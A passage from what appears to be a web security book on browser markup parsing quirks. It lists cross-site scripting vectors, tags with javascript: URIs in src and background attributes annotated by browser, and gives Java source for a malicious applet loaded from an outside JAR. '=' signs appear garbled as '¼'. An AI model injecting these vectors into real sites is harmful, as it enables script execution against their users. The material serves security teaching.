Basic markup obfuscation
from Firefox and Chromium are not all that surprising, another user agent really goes wild. We are talking about Opera. <iframe src¼"javascript:alert(1)"> // FF, Chromium, IE8 and Opera <embed src¼"javascript:alert(2)"> // FF, Chromium and Opera <embed code¼"javascript:alert(3)"> // Chromium only <img src¼"javascript:alert(4)"> // Opera 10 and IE6 <image src¼"javascript:alert(5)"> // Opera 10 and IE6 <body background¼"javascript:alert(5)"> // Opera 10 and IE6 <script src¼"javascript:alert(6)"> // Opera 10 and IE6 <table background¼"javascript:alert(7)"> // Opera 10 and IE6 <isindex type¼"image" src¼"javascript:alert(8)"> // IE6-7
Opera’s markup parser seems to have a pretty weird understanding of when to execute JavaScript from source attributes. The behavior shown here is similar to that of IE 6, because the same edge cases execute JavaScript on this browser too, except they are completed by the ancient and already mentioned attributes dynsrc and lowsrc. Also, let us not forget the applet tag, in which the attributes code and archive can be used to fetch JAR files and pick a class to work with. Since applets can interact with the DOM of a Web site and other instances, those tag attribute combinations can be considered rather dangerous. Here is some example Java code for a malicious applet and the necessary markup to execute the code: //XSS.java import java.applet.Applet; import netscape.javascript.*; public class XSS extends Applet { public void start() { try { JSObject window ¼ JSObject.getWindow(this); window.eval("alert(document.domain)"); } catch (JSException jse) { jse.printStackTrace(); } } } //test.html <applet code¼"XSS" archive¼"http://someserver.com/xss.jar"></applet>
Quirks modes are implemented in almost all user agents and provide a mode for rendering markup that does not necessarily follow any standards given by the W3C so that it is as compatible as possible with older and invalidly composed Web sites. It also means a developer cannot really predict what the user agent is doing with the Web site—and sometimes that hidden or deprecated features are being reenabled.
47